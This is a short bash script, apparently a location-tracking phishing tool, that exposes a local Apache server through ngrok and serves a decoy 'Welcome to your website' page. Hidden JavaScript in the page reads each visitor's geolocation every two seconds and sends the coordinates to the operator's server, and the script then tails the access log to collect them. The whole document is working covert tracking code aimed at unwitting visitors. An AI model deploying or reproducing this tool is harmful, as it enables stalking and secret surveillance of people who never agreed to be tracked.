#!/bin/bash

#64-bit
#xterm -e ./ngrok_64 http 80 & clear

#32-bit
xterm -e ./ngrok http 80 & clear
read -p '           URL: ' varurl
echo "<!DOCTYPE html>
<html>
   <head>
      <title>Welcome to your website</title>
      <style type=\"text/css\">
         body {
         background-image: url(\"pic.jpg\");
         background-size: 1000px 1600px;
         background-repeat: no-repeat;
         }
      </style>
   </head>
   <body>
      <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>
      <script>
         function httpGet(theUrl) {
             var xmlHttp = new XMLHttpRequest();
             xmlHttp.open( \"GET\", theUrl, false ); // false for synchronous request
             xmlHttp.send( null );
             return xmlHttp.responseText;
         }

         function autoUpdate() {
           navigator.geolocation.getCurrentPosition(function(position) {
             coords = position.coords.latitude + \",\" + position.coords.longitude;
              url = \""$varurl"/logme/\" + coords;
             httpGet(url);
             console.log('should be working');
             setTimeout(autoUpdate, 2000);
         })
         };
         \$(document).ready(function(){
            autoUpdate();
         });
      </script>
   </body>
</html>" > index.html

mv index.html /var/www/html/index.html
cp pic.jpg /var/www/html/pic.jpg
service apache2 start
xterm -e tail -f /var/log/apache2/access.log &
clear
exit
